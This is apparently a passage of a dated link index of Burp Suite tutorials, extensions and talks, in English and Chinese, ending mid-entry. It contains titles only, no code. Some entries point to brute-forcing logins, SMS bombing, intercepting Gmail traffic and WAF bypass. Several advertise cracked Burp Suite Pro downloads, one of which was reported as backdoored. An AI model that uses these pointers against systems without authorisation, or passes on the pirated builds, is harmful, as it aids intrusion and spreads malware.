[JosephDelgadillo] [Learn Kali Linux Episode #55: Burp Suite Basics](https://www.youtube.com/watch?v=vUzJZhhJjpk) - 2018.04 [freebuf] [关于Sql注入以及Burpsuite Intruders使用的一些浅浅的见解](http://www.freebuf.com/news/166495.html) - 2018.03 [secureideas] [Burp Suite continuing the Saga](https://blog.secureideas.com/2018/03/burp-suite-continuing-the-saga.html) - 2018.03 [HackerSploit] [Web App Penetration Testing - #3 - Brute Force Attacks With Burp Suite](https://www.youtube.com/watch?v=cL9NsXpUqYI) - 2018.03 [blackhillsinfosec] [Gathering Usernames from Google LinkedIn Results Using Burp Suite Pro](https://www.blackhillsinfosec.com/gathering-usernames-from-google-linkedin-results-using-burp-suite-pro/) - 2018.03 [nviso] [Intercepting Belgian eID (PKCS#11) traffic with Burp Suite on OS X / Kali / Windows](https://blog.nviso.be/2018/03/05/intercepting-belgian-eid-pkcs11-traffic-with-burp-suite-on-os-x-kali-windows/) - 2018.03 [4hou] [使用BurpSuite的Collaborator查找.Onion隐藏服务的真实IP地址](http://www.4hou.com/technology/10367.html) - 2018.02 [hackingarticles] [Advance Web Application Testing using Burpsuite](http://www.hackingarticles.in/advance-web-application-testing-using-burpsuite/) - 2018.02 [HackerSploit] [Web App Penetration Testing - #1 - Setting Up Burp Suite](https://www.youtube.com/watch?v=YCCrVtvAu2I) - 2018.02 [hackers] [Online Password Cracking with THC-Hydra and Burp Suite](https://www.hackers-arise.com/single-post/2018/02/26/Online-Password-Cracking-with-THC-Hydra-and-Burp-Suite) - 2018.02 [nxadmin] [ios 11.2.5 burpsuite抓https](http://www.nxadmin.com/mobile-sec/1673.html) - 2018.02 [ZeroNights] [[Defensive Track]Eldar Zaitov, Andrey Abakumov - Automation of Web Application Scanning With Burp](https://www.youtube.com/watch?v=pQ4v4H7bHLE) - 2018.02 [hackingarticles] [Engagement Tools Tutorial in Burp suite](http://www.hackingarticles.in/engagement-tools-tutorial-burp-suite/) - 2018.02 [hackingarticles] [Payload Processing Rule in Burp suite (Part 2)](http://www.hackingarticles.in/payload-processing-rule-burp-suite-part-2/) - 2018.02 [dustri] [Ghetto recursive payload in the Burp Intruder](https://dustri.org/b/ghetto-recursive-payload-in-the-burp-intruder.html) - 2018.02 [hackingarticles] [Payload Processing Rule in Burp suite (Part 1)](http://www.hackingarticles.in/payload-processing-rule-burp-suite-part-1/) - 2018.01 [4hou] [如何绕过csrf保护,并在burp suite中使用intruder?](http://www.4hou.com/technology/10134.html) - 2018.01 [360] [恶意软件逆向:burpsuite 序列号器后门分析](https://www.anquanke.com/post/id/96866/) - 2018.01 [nviso] [结合使用 Burp 与自定义 rootCA 来探查 Android N 网络流量](https://blog.nviso.be/2018/01/31/using-a-custom-root-ca-with-burp-for-inspecting-android-n-traffic/) - 2018.01 [hackingarticles] [WordPress Exploitation using Burpsuite (Burp_wp Plugin)](http://www.hackingarticles.in/wordpress-exploitation-using-burpsuite-burp_wp-plugin/) - 2018.01 [0x00sec] [之前发布的 Burpsuite Keygen 内嵌的后门分析](https://0x00sec.org/t/malware-reversing-burpsuite-keygen/5167/) - 2018.01 [hackingarticles] [Beginners Guide to Burpsuite Payloads (Part 2)](http://www.hackingarticles.in/beginners-guide-burpsuite-payloads-part-2/) - 2018.01 [freebuf] [如何在Android Nougat中正确配置Burp Suite?](http://www.freebuf.com/articles/network/160900.html) - 2018.01 [hackingarticles] [Burpsuite Encoder & Decoder Tutorial](http://www.hackingarticles.in/burpsuite-encoder-decoder-tutorial/) - 2018.01 [hackingarticles] [Beginners Guide to Burpsuite Payloads (Part 1)](http://www.hackingarticles.in/beginners-guide-burpsuite-payloads-part-1/) - 2018.01 [security] [Burp WP - Find vulnerabilities in WordPress using Burp](https://security.szurek.pl/burp-wp-find-vulnerabilities-in-wordpress-using-burp.html) - 2018.01 [ropnop] [Configuring Burp Suite with Android Nougat](https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/) - 2018.01 [DemmSec] [Beginner Hacking 2.0 - Episode 6 - Burp (Brute-forcing)](https://www.youtube.com/watch?v=6EZ2oU-qsOQ) - 2018.01 [blackhillsinfosec] [Analyzing Extension Effectiveness with Burp](https://www.blackhillsinfosec.com/analyzing-extension-effectiveness-burp/) - 2018.01 [freebuf] [经验分享 | Burpsuite抓取非HTTP流量](http://www.freebuf.com/articles/network/158589.html) - 2018.01 [4hou] [实战教程:用Burpsuite测试移动应用程序](http://www.4hou.com/penetration/8965.html) - 2017.12 [pediy] [[翻译]使用Burp Suite执行更复杂的Intruder攻击](https://bbs.pediy.com/thread-223642.htm) - 2017.12 [freebuf] [如何使用Burp和Magisk在Android 7.0监测HTTPS流量](http://www.freebuf.com/articles/terminal/158492.html) - 2017.12 [freebuf] [经验分享 | Burpsuite插件的使用](http://www.freebuf.com/sectool/158005.html) - 2017.12 [nviso] [Intercepting HTTPS Traffic from Apps on Android 7+ using Magisk & Burp](https://blog.nviso.be/2017/12/22/intercepting-https-traffic-from-apps-on-android-7-using-magisk-burp/) - 2017.12 [trustedsec] [More Complex Intruder Attacks with Burp!](https://www.trustedsec.com/2017/12/complex-intruder-attacks-burp/) - 2017.12 [4hou] [如何使用 Burp 代理调试安卓应用中的 HTTP(S) 流量](http://www.4hou.com/web/9385.html) - 2017.12 [aliyun] [安卓脱壳&&协议分析&&Burp辅助分析插件编写](https://xz.aliyun.com/t/1805) - 2017.12 [freebuf] [新手福利 | Burpsuite你可能不知道的技巧](http://www.freebuf.com/articles/rookie/156928.html) - 2017.12 [freebuf] [经验分享 | Burpsuite中宏的使用](http://www.freebuf.com/articles/web/156735.html) - 2017.12 [aliyun] [使用OWASP Zap度过没有Burp的过渡期](https://xz.aliyun.com/t/1782) - 2017.12 [avleonov] [Vulners.com vulnerability detection plugins for Burp Suite and Google Chrome](https://avleonov.com/2017/12/10/vulners-com-vulnerability-detection-plugins-for-burp-suite-and-google-chrome/) - 2017.12 [freebuf] [利用Burp Suite挖掘暗网服务的真实IP](http://www.freebuf.com/articles/web/155254.html) - 2017.11 [digitalforensicstips] [Using Burp Suite’s Collaborator to Find the True IP Address for a .Onion Hidden Service](http://digitalforensicstips.com/2017/11/using-burp-suites-collaborator-to-find-the-true-ip-address-for-a-onion-hidden-service/) - 2017.11 [n00py] [Exploiting blind Java deserialization with Burp and Ysoserial](https://www.n00py.io/2017/11/exploiting-blind-java-deserialization-with-burp-and-ysoserial/) - 2017.11 [nxadmin] [burpsuite抓包https请求相关](http://www.nxadmin.com/mobile-sec/1646.html) - 2017.11 [polaris] [reCAPTCHA:一款自动识别图形验证码并用于Intruder Payload中的BurpSuite插件](http://polaris-lab.com/index.php/archives/387/) - 2017.10 [TechnoHacker] [How to Crack Logins with Burp Suite](https://www.youtube.com/watch?v=SCHEBItZkdo) - 2017.10 [freebuf] [利用Burp Suite对OWASP Juice Shop进行渗透测试](http://www.freebuf.com/sectool/151920.html) - 2017.10 [4hou] [Bypass WAF:使用Burp插件绕过一些WAF设备](http://www.4hou.com/tools/8065.html) - 2017.10 [gdssecurity] [Pentesting Fast Infoset based web applications with Burp](https://blog.gdssecurity.com/labs/2017/10/10/pentesting-fast-infoset-based-web-applications-with-burp.html) - 2017.10 [d0znpp] [The best Burp plugin I’ve ever seen](https://medium.com/p/2d17780342) - 2017.10 [n00py] [How to Burp Good](https://www.n00py.io/2017/10/how-to-burp-good/) - 2017.09 [netspi] [BurpCollaboratorDNSTunnel 介绍](https://blog.netspi.com/dns-tunneling-with-burp-collaborator/) - 2017.09 [freebuf] [Handy Collaborator :用于挖掘out-of-band类漏洞的Burp插件介绍](http://www.freebuf.com/sectool/147948.html) - 2017.09 [aliyun] [请问能burpsuite的插件中直接获取到直接获取到漏洞报告吗?](https://xz.aliyun.com/t/1018) - 2017.09 [niemand] [Automatizing Burp + Carbonator + Slack](https://niemand.com.ar/2017/09/18/automatizing-burp-carbonator-slack/) - 2017.09 [trustwave] [burplay介绍](https://www.trustwave.com/Resources/SpiderLabs-Blog/Introducing-Burplay,-A-Burp-Extension-for-Detecting-Privilege-Escalations/) - 2017.09 [freebuf] [如何通过BurpSuiteMacro自动化模糊测试Web应用的输入点](http://www.freebuf.com/articles/web/147182.html) - 2017.09 [mediaservice] [HandyCollaborator介绍](https://techblog.mediaservice.net/2017/09/handy-collaborator-because-burp-suite-collaborator-is-useful-also-during-manual-testing/) - 2017.09 [securestate] [Updating Anti-CSRF Tokens in Burp Suite](https://warroom.securestate.com/updating-anti-csrf-tokens-burp-suite/) - 2017.09 [4hou] [利用Burp“宏”解决自动化 web fuzzer的登录问题](http://www.4hou.com/web/7542.html) - 2017.09 [securestate] [Updating Anti-CSRF Tokens in Burp Suite](https://warroom.rsmus.com/updating-anti-csrf-tokens-burp-suite/) - 2017.09 [360] [如何使用Burp Suite Macros绕过防护进行自动化fuzz测试](https://www.anquanke.com/post/id/86768/) - 2017.09 [initblog] [Hacking a Pizza Order with Burp Suite](https://initblog.com/2017/pizza-hacking/) - 2017.09 [securelayer7] [使用 Burp 的宏功能,实现 WebApp 输入 Fuzzing 的自动化](http://blog.securelayer7.net/automating-web-apps-input-fuzzing-via-burp-macros/) - 2017.09 [securelayer7] [Automating Web Apps Input fuzzing via Burp Macros](https://blog.securelayer7.org/automating-web-apps-input-fuzzing-via-burp-macros/) - 2017.09 [freebuf] [如何在特定的渗透测试中使用正确的Burp扩展插件](http://www.freebuf.com/sectool/146247.html) - 2017.08 [avleonov] [Burp Suite Free Edition and NTLM authentication in ASP.net applications](https://avleonov.com/2017/08/29/burp-suite-free-edition-and-ntlm-authentication-in-asp-net-applications/) - 2017.08 [portswigger] [如何为特定的渗透测试环境定制 Burp 扩展](https://portswigger.net/blog/adapting-burp-extensions-for-tailored-pentesting) - 2017.08 [cybrary] [Your Complete Guide to Burp Suite](https://www.cybrary.it/2017/08/your-complete-guide-to-burp-suite/) - 2017.08 [freebuf] [使用Burp和自定义Sqlmap Tamper利用二次注入漏洞](http://www.freebuf.com/articles/web/142963.html) - 2017.08 [freebuf] [HUNT:一款可提升漏洞扫描能力的BurpSuite漏洞扫描插件](http://www.freebuf.com/sectool/143182.html) - 2017.08 [4hou] [通过Burp以及自定义的Sqlmap Tamper进行二次SQL注入](http://www.4hou.com/system/6945.html) - 2017.08 [360] [Burp Suite扩展之Java-Deserialization-Scanner](https://www.anquanke.com/post/id/86594/) - 2017.08 [360] [联合Frida和BurpSuite的强大扩展--Brida](https://www.anquanke.com/post/id/86567/) - 2017.08 [360] [如何借助Burp和SQLMap Tamper利用二次注入](https://www.anquanke.com/post/id/86551/) - 2017.08 [4hou] [如何使用Burp Suite模糊测试SQL注入、XSS、命令执行漏洞](http://www.4hou.com/vulnerable/6933.html) - 2017.08 [4hou] [Brida:将frida与burp结合进行移动app渗透测试](http://www.4hou.com/penetration/6916.html) - 2017.08 [pentest] [使用 Burp 和自定义的Sqlmap Tamper 脚本实现 Second Order SQLi 漏洞利用](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/) - 2017.07 [360] [BurpSuite插件:利用BurpSuite Spider收集子域名和相似域名](https://www.anquanke.com/post/id/86512/) - 2017.07 [polaris] [BurpSuite插件:利用BurpSuite Spider收集子域名和相似域名](http://polaris-lab.com/index.php/archives/349/) - 2017.07 [hackingarticles] [Fuzzing SQL,XSS and Command Injection using Burp Suite](http://www.hackingarticles.in/fuzzing-sqlxss-command-injection-using-burp-suite/) - 2017.07 [freebuf] [Burp Suite扫描器漏洞扫描功能介绍及简单教程](http://www.freebuf.com/sectool/141435.html) - 2017.07 [hackerone] [Hey Hackers: We’ve got your free Burp Suite Professional license right here](https://www.hackerone.com/blog/Hey-Hackers-Weve-got-your-free-Burp-Suite-Professional-license-right-here) - 2017.07 [hackingarticles] [Vulnerability Analysis in Web Application using Burp Scanner](http://www.hackingarticles.in/vulnerability-analysis-web-application-using-burp-scanner/) - 2017.07 [aliyun] [Burpsuite handshake alert: unrecognized_name解决办法](https://xz.aliyun.com/t/1080) - 2017.07 [4hou] [用VirtualBox、INetSim和Burp配置一个恶意软件分析实验室](http://www.4hou.com/technology/5655.html) - 2017.07 [vulners] [2 years of Vulners and new plugin for Burp Scanner](https://blogvulners.wordpress.com/2017/07/07/2-years-of-vulners-and-new-plugin-for-burp-scanner/) - 2017.07 [intrinsec] [Burp extension « Scan manual insertion point »](https://securite.intrinsec.com/2017/07/03/burp-extension-scan-manual-insertion-point/) - 2017.06 [hackingarticles] [How to Spider Web Applications using Burpsuite](http://www.hackingarticles.in/spider-web-applications-using-burpsuite/) - 2017.06 [4hou] [使用 Burp Infiltrator 进行漏洞挖掘](http://www.4hou.com/tools/5815.html) - 2017.06 [8090] [渗透测试神器Burp Suite v1.6.17(破解版)](http://www.8090-sec.com/archives/8674) - 2017.06 [4hou] [将Burp Scanner漏洞结果转换为Splunk事件](http://www.4hou.com/technology/5703.html) - 2017.06 [portswigger] [Behind enemy lines: bug hunting with Burp Infiltrator | Blog](https://portswigger.net/blog/behind-enemy-lines-bug-hunting-with-burp-infiltrator) - 2017.06 [christophetd] [使用 VirtualBox,INetSim和 Burp 搭建自己的恶意软件分析实验室](https://blog.christophetd.fr/malware-analysis-lab-with-virtualbox-inetsim-and-burp/) - 2017.05 [aliyun] [各位师傅们请问BurpSuite怎么同时传递多个页面](https://xz.aliyun.com/t/1147) - 2017.05 [360] [Burp Suite Mobile Assistant](https://www.anquanke.com/post/id/86117/) - 2017.05 [4hou] [NTLM认证失效时,如何使用Fiddler配合Burp Suite进行渗透测试?](http://www.4hou.com/technology/4797.html) - 2017.05 [netspi] [Beautifying JSON in Burp](https://blog.netspi.com/beautifying-json-in-burp/) - 2017.05 [mediaservice] [NTLM认证失效时,如何使用Fiddler配合Burp Suite进行渗透测试?](https://techblog.mediaservice.net/2017/05/fiddler-ntlm-authentication-when-burp-suite-fails/) - 2017.05 [compass] [JWT Burp Extension](https://blog.compass-security.com/2017/05/jwt-burp-extension/) - 2017.05 [trustwave] [Airachnid: Web Cache Deception Burp Extender](https://www.trustwave.com/Resources/SpiderLabs-Blog/Airachnid--Web-Cache-Deception-Burp-Extender/) - 2017.05 [moxia] [【技术分享】Burp Suite扩展开发之Shodan扫描器(已开源)](http://www.moxia.org/Blog.php/index.php/archives/214) - 2017.05 [elearnsecurity] [Developing Burp Suite Extensions](https://blog.elearnsecurity.com/developing-burp-suite-extensions.html) - 2017.04 [securityblog] [Stunnel and Burp Pro](http://securityblog.gr/4329/stunnel-and-burp-pro/) - 2017.04 [] [Build a Private Burp Collaborator Server on AWS with Terraform and Ansible](https://www.4armed.com/blog/burp-collaborator-terraform-ansible/) - 2017.04 [aliyun] [Burp Suite收集到的录像、文档以及视频资料](https://xz.aliyun.com/t/1175) - 2017.04 [360] [BurpSuite 代理设置的小技巧](https://www.anquanke.com/post/id/85925/) - 2017.04 [freebuf] [如何通过BurpSuite检测Blind XSS漏洞](http://www.freebuf.com/articles/web/131545.html) - 2017.04 [jerrygamblin] [Burp Settings File](https://jerrygamblin.com/2017/04/17/burp-settings-file/) - 2017.04 [doyler] [Burp VERBalyzer v1.0 Release](https://www.doyler.net/security-not-included/burp-verbalyzer-release) - 2017.04 [agarri] [Exploiting a Blind XSS using Burp Suite](http://www.agarri.fr/blog/../kom/archives/2017/04/04/exploiting_a_blind_xss_using_burp_suite/index.html) - 2017.04 [agarri] [Exploiting a Blind XSS using Burp Suite](https://www.agarri.fr/blog/archives/2017/04/04/exploiting_a_blind_xss_using_burp_suite/index.html) - 2017.04 [blackhillsinfosec] [Using Burp with ProxyCannon](https://www.blackhillsinfosec.com/using-burp-proxycannon/) - 2017.03 [4hou] [利用Burp“宏”自动化另类 SQLi](http://www.4hou.com/technology/3664.html) - 2017.03 [freebuf] [Burpsuite+SQLMAP双璧合一绕过Token保护的应用进行注入攻击](http://www.freebuf.com/sectool/128589.html) - 2017.03 [360] [使用burp macros和sqlmap绕过csrf防护进行sql注入](https://www.anquanke.com/post/id/85593/) - 2017.02 [zsec] [Learning the Ropes 101: Burp Suite Intro](https://blog.zsec.uk/ltr101-burp-suite-intro/) - 2017.02 [cyberis] [Creating Macros for Burp Suite](https://www.cyberis.co.uk/burp_macros.html) - 2017.02 [polaris] [使用BurpSuite攻击JavaScript Web服务代理](http://polaris-lab.com/index.php/archives/150/) - 2017.02 [netspi] [Attacking JavaScript Web Service Proxies with Burp](https://blog.netspi.com/attacking-javascript-web-service-proxies-burp/) - 2017.02 [freebuf] [使用Burpsuite代理和pypcap抓包进行抢红包的尝试](http://www.freebuf.com/sectool/125969.html) - 2017.02 [polaris] [BurpSuite和Fiddler串联使用解决App测试漏包和速度慢的问题](http://polaris-lab.com/index.php/archives/15/) - 2017.01 [securityinnovation] [Solve the Software Security Authorization Testing Riddle with AuthMatrix for Burp Suite](https://blog.securityinnovation.com/solve-the-software-security-authorization-testing-riddle-with-authmatrix-for-burp-suite) - 2017.01 [freebuf] [使用Frida配合Burp Suite追踪API调用](http://www.freebuf.com/articles/web/125260.html) - 2017.01 [hackingarticles] [Hack the Basic HTTP Authentication using Burpsuite](http://www.hackingarticles.in/hack-basic-http-authentication-using-burpsuite/) - 2017.01 [hackingarticles] [Sql Injection Exploitation with Sqlmap and Burp Suite (Burp CO2 Plugin)](http://www.hackingarticles.in/sql-injection-exploitation-sqlmap-burp-suite-burp-co2-plugin/) - 2017.01 [360] [超越检测:利用Burp Collaborator执行SQL盲注](https://www.anquanke.com/post/id/85297/) - 2017.01 [360] [使用Burp的intruder功能测试有csrf保护的应用程序](https://www.anquanke.com/post/id/85289/) - 2017.01 [polaris] [BurpSuite插件开发Tips:请求响应参数的AES加解密](http://polaris-lab.com/index.php/archives/40/) - 2017.01 [silentsignal] [Beyond detection: exploiting blind SQL injections with Burp Collaborator](https://blog.silentsignal.eu/2017/01/03/beyond-detection-exploiting-blind-sql-injections-with-burp-collaborator/) - 2016.12 [polaris] [BurpSuite插件分享:图形化重算sign和参数加解密插件](http://polaris-lab.com/index.php/archives/19/) - 2016.12 [360] [Burp Suite扩展开发之Shodan扫描器(已开源)](https://www.anquanke.com/post/id/85209/) - 2016.12 [rapid7] [Burp Series: Intercepting and modifying made easy](https://blog.rapid7.com/2016/12/09/burp-series-intercepting-and-modifying-made-easy/) - 2016.12 [polaris] [BurpSuite 实战指南](http://polaris-lab.com/index.php/archives/136/) - 2016.12 [360] [BurpSuite 实战指南(附下载地址)](https://www.anquanke.com/post/id/85086/) - 2016.12 [aliyun] [BurpSuite实战指南](https://xz.aliyun.com/t/1306) - 2016.12 [freebuf] [burpsuite_pro_v1.7.11破解版(含下载)](http://www.freebuf.com/sectool/121992.html) - 2016.12 [hackers] [Web App Hacking: Hacking Form Authentication with Burp Suite](https://www.hackers-arise.com/single-post/2016/12/05/Web-App-Hacking-Hacking-Form-Authentication-with-Burp-Suite) - 2016.12 [360] [burpsuite_pro_v1.7.11破解版(含下载地址)](https://www.anquanke.com/post/id/85052/) - 2016.12 [] [burpsuite_pro_v1.7.11破解版(含下载地址)](http://www.91ri.org/16532.html) - 2016.11 [nxadmin] [Burpsuite抓包Android模拟器(AVD)设置](http://www.nxadmin.com/mobile-sec/1511.html) - 2016.11 [jerrygamblin] [Automated Burp Suite Scanning and Reporting To Slack.](https://jerrygamblin.com/2016/11/12/automated-burp-suite-scanning-and-reporting-to-slack/) - 2016.11 [360] [Burp Suite插件开发之SQL注入检测(已开源)](https://www.anquanke.com/post/id/84882/) - 2016.11 [freebuf] [渗透测试神器Burp Suite v1.7.08发布(含下载)](http://www.freebuf.com/sectool/118802.html) - 2016.10 [averagesecurityguy] [Recon-ng + Google Dorks + Burp = ...](https://averagesecurityguy.github.io/2016/10/21/recon-ng-dorks-burp/) - 2016.10 [kalilinuxtutorials] [Burpsuite – Use Burp Intruder to Bruteforce Forms](http://kalilinuxtutorials.com/burp-intruder-bruteforce-forms/) - 2016.10 [hackingarticles] [SMS Bombing on Mobile using Burpsuite](http://www.hackingarticles.in/sms-bombing-mobile-using-burpsuite/) - 2016.09 [hackingarticles] [Hijacking Gmail Message on Air using Burpsuite](http://www.hackingarticles.in/hijacking-gmail-message-air-using-burpsuite/) - 2016.09 [securify] [Burp Suite security automation with Selenium and Jenkins](https://securify.nl/en/blog/SFY20160901/burp-suite-security-automation-with-selenium-and-jenkins.html) - 2016.09 [hackingarticles] [Brute Force Website Login Page using Burpsuite (Beginner Guide)](http://www.hackingarticles.in/brute-force-website-login-page-using-burpsuite-beginner-guide/) - 2016.09 [securityblog] [Simple python script to make multiple raw requests from Burp](http://securityblog.gr/3634/simple-python-script-to-make-multiple-raw-requests-from-burp/) - 2016.09 [freebuf] [新手教程:如何使用Burpsuite抓取手机APP的HTTPS数据](http://www.freebuf.com/articles/terminal/113940.html) - 2016.08 [bogner] [Burp.app – Making Burp a little more OS X like](https://bogner.sh/2016/08/burp-app-making-burp-a-bit-more-os-x-like/) - 2016.08 [] [Configuring Google Chrome to Proxy Through Burp Suite](https://www.4armed.com/blog/google-chrome-proxy-through-burp-suite/) - 2016.07 [portswigger] [Introducing Burp Infiltrator | Blog](https://portswigger.net/blog/introducing-burp-infiltrator) - 2016.07 [] [Burpsuite之Burp Collaborator模块介绍](http://www.91ri.org/16159.html) - 2016.06 [timothydeblock] [When not to use Burp Suite](http://www.timothydeblock.com/eis/49) - 2016.06 [freebuf] [BurpSuite插件开发Tips:请求响应参数的AES加解密](http://www.freebuf.com/articles/terminal/106673.html) - 2016.06 [securityblog] [Using Burp Intruder to Test CSRF Protected Applications](http://securityblog.gr/3446/using-burp-intruder-to-test-csrf-protected-applications/) - 2016.06 [insinuator] [SAMLReQuest Burpsuite Extention](https://insinuator.net/2016/06/samlrequest-burpsuite-extention/) - 2016.05 [jerrygamblin] [BurpBrowser](https://jerrygamblin.com/2016/05/31/burpbrowser/) - 2016.05 [safebuff] [ImageTragick using BurpSuite and Metasploit](http://blog.safebuff.com/2016/05/26/ImageTragick-using-BurpSuite-and-Metasploit/) - 2016.05 [freebuf] [BurpSuite日志分析过滤工具,加快SqlMap进行批量扫描的速度](http://www.freebuf.com/sectool/104855.html) - 2016.05 [] [再谈Burp破解](http://www.91ri.org/15799.html) - 2016.05 [silentsignal] [Detecting ImageTragick with Burp Suite Pro](https://blog.silentsignal.eu/2016/05/13/detecting-imagetragick-with-burp-suite-pro/) - 2016.04 [freebuf] [Burpsuite插件开发(二):信息采集插件](http://www.freebuf.com/sectool/102673.html) - 2016.04 [toolswatch] [Burp Suite Professional v1.7.02 Beta](http://www.toolswatch.org/2016/04/burp-suite-professional-v1-7-02-beta/) - 2016.04 [freebuf] [针对非Webapp测试的Burp技巧(二):扫描、重放](http://www.freebuf.com/articles/web/100875.html) - 2016.04 [freebuf] [针对非Webapp测试的Burp技巧(一):拦截和代理监听](http://www.freebuf.com/articles/terminal/100908.html) - 2016.04 [portswigger] [Introducing Burp Projects | Blog](https://portswigger.net/blog/introducing-burp-projects) - 2016.04 [parsiya] [Thick Client Proxying - Part 4: Burp in Proxy Chains](https://parsiya.net/blog/2016-04-07-thick-client-proxying---part-4-burp-in-proxy-chains/) - 2016.04 [parsiya] [Thick Client Proxying - Part 4: Burp in Proxy Chains](https://parsiya.net/blog/2016-04-07-thick-client-proxying-part-4-burp-in-proxy-chains/) - 2016.04 [breakpoint] [Web Hacking with Burp Suite 101](https://breakpoint-labs.com/blog/web-hacking-with-burp-suite-101/) - 2016.04 [parsiya] [Thick Client Proxying - Part 3: Burp Options and Extender](https://parsiya.net/blog/2016-04-02-thick-client-proxying---part-3-burp-options-and-extender/) - 2016.04 [hack] [Advanced Burp Suite](https://hack-ed.net/2016/04/02/advanced-burp-suite/) - 2016.04 [parsiya] [Thick Client Proxying - Part 3: Burp Options and Extender](https://parsiya.net/blog/2016-04-02-thick-client-proxying-part-3-burp-options-and-extender/) - 2016.03 [freebuf] [Burp Suite新手指南](http://www.freebuf.com/articles/web/100377.html) - 2016.03 [parsiya] [Thick Client Proxying - Part 2: Burp History, Intruder, Scanner and More](https://parsiya.net/blog/2016-03-29-thick-client-proxying---part-2-burp-history-intruder-scanner-and-more/) - 2016.03 [parsiya] [Thick Client Proxying - Part 2: Burp History, Intruder, Scanner and More](https://parsiya.net/blog/2016-03-29-thick-client-proxying-part-2-burp-history-intruder-scanner-and-more/) - 2016.03 [freebuf] [如何编写burpsuite联动sqlmap的插件](http://www.freebuf.com/sectool/100093.html) - 2016.03 [parsiya] [Thick Client Proxying - Part 1: Burp Interception and Proxy Listeners](https://parsiya.net/blog/2016-03-27-thick-client-proxying---part-1-burp-interception-and-proxy-listeners/) - 2016.03 [parsiya] [Thick Client Proxying - Part 1: Burp Interception and Proxy Listeners](https://parsiya.net/blog/2016-03-27-thick-client-proxying-part-1-burp-interception-and-proxy-listeners/) - 2016.03 [portswigger] [Using Burp Suite to audit and exploit an eCommerce application | Blog](https://portswigger.net/blog/using-burp-suite-to-audit-and-exploit-an-ecommerce-application) - 2016.03 [freebuf] [渗透测试神器Burpsuite Pro v1.6.38(含下载)](http://www.freebuf.com/sectool/99127.html) - 2016.03 [360] [使用burp进行java反序列化攻击](https://www.anquanke.com/post/id/83571/) - 2016.03 [netspi] [Java Deserialization Attacks with Burp](https://blog.netspi.com/java-deserialization-attacks-burp/) - 2016.02 [] [对burpsuite_pro逆向的一点心得](http://www.91ri.org/15264.html) - 2016.02 [parsiya] [Installing Burp Certificate Authority in Windows Certificate Store](https://parsiya.net/blog/2016-02-21-installing-burp-certificate-authority-in-windows-certificate-store/) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 00 - Intro](https://www.youtube.com/watch?v=AVzC7ETqpDo) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 06 - Sequencer and Scanner](https://www.youtube.com/watch?v=G-v581pXerE) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 04 - Repeater Module](https://www.youtube.com/watch?v=9Zh_7s5csCc) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 03 - Proxy Module](https://www.youtube.com/watch?v=PDTwYFkjQBE) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 05 - Target and Spider](https://www.youtube.com/watch?v=dCKPZUSOlr8) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 08 - Congrats](https://www.youtube.com/watch?v=8Mh5sMb_D2Q) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 02 - General Concept](https://www.youtube.com/watch?v=udl4oqr_ylM) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 01 - Environment Setup](https://www.youtube.com/watch?v=yqnUOdr0eVk) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 07 - Intruder and Comparer](https://www.youtube.com/watch?v=7OXe8THhmao) - 2016.02 [gracefulsecurity] [Introduction to Burp Suite Pro](https://www.gracefulsecurity.com/introduction-to-burp-suite-pro/) - 2016.02 [bishopfox] [Burp, Collaborate, and Listen: A Pentester Reviews the Latest Burp Suite Addition](https://www.bishopfox.com/blog/2016/02/burp-collaborate-listen-pentester-reviews-latest-burp-suite-addition/) - 2016.02 [xxlegend] [如何让Burpsuite监听微信公众号](http://xxlegend.com/2016/02/01/如何让Burpsuite监听微信公众号/) - 2016.02 [xxlegend] [Burpsuite 插件开发之RSA加解密](http://xxlegend.com/2016/02/01/Burpsuite插件开发之RSA加解密/) - 2016.02 [xxlegend] [Burpsuite 插件开发之RSA加解密](http://xxlegend.com/2016/02/01/Burpsuite插件开发之RSA加解密/) - 2016.02 [xxlegend] [如何让Burpsuite监听微信公众号](http://xxlegend.com/2016/02/01/如何让Burpsuite监听微信公众号/) - 2016.01 [hack] [Burp Suite For Beginners](https://hack-ed.net/2016/01/09/burp-suite-for-beginners/) - 2016.01 [freebuf] [Burpsuite插件开发之RSA加解密](http://www.freebuf.com/articles/security-management/92376.html) - 2016.01 [blackhillsinfosec] [Pentesting ASP.NET Cookieless Sessions with Burp](https://www.blackhillsinfosec.com/pentesting-asp-net-cookieless-sessions-with-burp/) - 2015.12 [BSidesCHS] [BSidesCHS 2015: Building Burp Extensions - Jason Gillam](https://www.youtube.com/watch?v=v7Yjdi9NvOY) - 2015.12 [nsfocus] [Burpsuite插件开发之RSA加解密](http://blog.nsfocus.net/burpsuite-plugin-development-rsa-encryption-decryption/) - 2015.12 [blackhillsinfosec] [Using Simple Burp Macros to Automate Testing](https://www.blackhillsinfosec.com/using-simple-burp-macros-to-automate-testing/) - 2015.12 [toolswatch] [Sleepy Puppy Burp Extension for XSS v1.0](http://www.toolswatch.org/2015/12/sleepy-puppy-burp-extension-for-xss-v1-0/) - 2015.12 [jerrygamblin] [Proxying BurpSuite through TOR](https://jerrygamblin.com/2015/12/18/proxying-burpsuite-through-tor/) - 2015.12 [mediaservice] [Scanning for Java Deserialization Vulnerabilities in web applications with Burp Suite](https://techblog.mediaservice.net/2015/12/scanning-for-java-deserialization-vulnerabilities-in-web-applications-with-burp-suite/) - 2015.12 [toolswatch] [[New Tool] SAML Raider v1.1.1 – SAML2 Burp Extension](http://www.toolswatch.org/2015/12/new-tool-saml-raider-v1-1-1-saml2-burp-extension/) - 2015.12 [sans] [New Burp Feature - ClickBandit](https://isc.sans.edu/forums/diary/New+Burp+Feature+ClickBandit/20475/) - 2015.12 [portswigger] [Burp Clickbandit: A JavaScript based clickjacking PoC generator | Blog](https://portswigger.net/blog/burp-clickbandit-a-javascript-based-clickjacking-poc-generator) - 2015.12 [nabla] [Burp and iOS 9 App Transport Security](https://nabla-c0d3.github.io/blog/2015/12/01/burp-ios9-ats/) - 2015.11 [gracefulsecurity] 